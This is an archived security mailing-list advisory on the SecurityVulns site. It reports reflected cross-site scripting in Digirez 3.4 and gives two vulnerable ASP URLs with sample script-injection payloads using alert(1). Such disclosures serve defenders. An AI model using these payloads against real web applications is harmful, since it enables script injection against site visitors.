Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  GTP 3G © Gnuturk Portal System year=**&month= Cross-Site Scripting Vulnerability

  Pligg critical vulnerability

  BoastMachine index.php Cross Site Scripting Vulnerability

  Web Directory / Search Engine v2.0 Authentication Bypass/Database Download Vulne

From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:26 мая 2007 г.
Subject:Multiple XSS in Digirez

Hello
Vulnerable : Digirez
Version: 3.4
web : http://www.digiappz.com


XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(
1);</script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1)
;</script>

Discovered  By Linux_Drox
www.LeZr.Com

Best regards ,,

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server